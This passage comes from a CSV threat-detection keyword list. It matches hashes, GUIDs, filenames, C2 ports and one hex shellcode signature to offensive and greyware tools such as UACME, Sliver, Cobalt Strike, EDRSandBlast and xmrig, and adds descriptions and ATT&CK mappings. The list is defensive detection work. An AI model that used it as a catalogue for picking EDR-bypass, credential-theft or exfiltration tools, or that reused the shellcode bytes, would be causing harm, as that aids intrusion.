Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver 
vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*365-Stealer.py*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*365-Stealer-master*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. 
regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*36F9C306-5F45-4946-A259-610C05BD90DF*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*375D8508-F60D-4E24-9DF6-1E591D2FA474*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","0","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - 
T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*3bb553cd-0a48-402d-9812-8daff60ac628*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" +"*3BEF8A16-981F-4C65-8AE7-C612B46BE446*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3C601672-7389-42B2-B5C9-059846E1DA88*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","0","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" +"*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD 
Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - 
TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*3kom-superhack.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*3snake-master*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*4.5.6.7:1337*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*40056/service-endpoint*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - 
T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","N/A","10","1","63","9","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z" +"*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*-443.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" +"*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" +"*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*449CE476-7B27-47F5-B09C-570788A2F261*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*45D748AC-9B16-426E-808D-94662B0417F7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4c21f433ebb3a72668a36a707daed37afb5c3ed2402d60b1634a741c36f2ed10*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4C3B106C-8782-4374-9459-851749072123*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*4C574B86-DC07-47EA-BB02-FD50AE002910*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*4cec28b4c00002245dffc8346be0cc11*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" +"*4d15af5a22467795c5367c3956746d01424795784f62ca3f30e4619c063338a5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" +"*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*4d5350c8-7f8c-47cf-8cde-c752018af17e*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*4d870a821d4104536f0ae7d1920748e9a6ea2dc828103470516a9a2f0b9601ff*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*4ddc82b4af931ab55f44d977bde81bfbc4151b5dcdccc03142831a301b5ec3c8*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*4DE43724-3851-4376-BB6C-EA15CF500C44*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*4E0CA74F5E074DFF389263D15E3913750EB437C1C3CD3B212C2998352023B980*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - 
TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*4F2AD0E0-8C4D-45CB-97DE-CE8D4177E7BF*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*4fe9647d6a8bf4790df0277283f9874385e0cd05f3008406ca5624aba8d78924*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*4g3nt47/Striker*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" +"*50050/SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" 
+"*505152535657556A605A6863616C6354594883EC2865488B32488B7618488B761048AD488B30488B7E3003573C8B5C17288B741F204801FE8B541F240FB72C178D5202AD813C0757696E4575EF8B741F1C4801FE8B34AE4801F799FFD74883C4305D5F5E5B5A5958C3*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*5067F916-9971-47D6-BBCB-85FB3982584F*","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","0","N/A","N/A","10","1650","263","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" +"*5086CE01-1032-4CA3-A302-6CFF2A8B64DC*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*516280565958*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
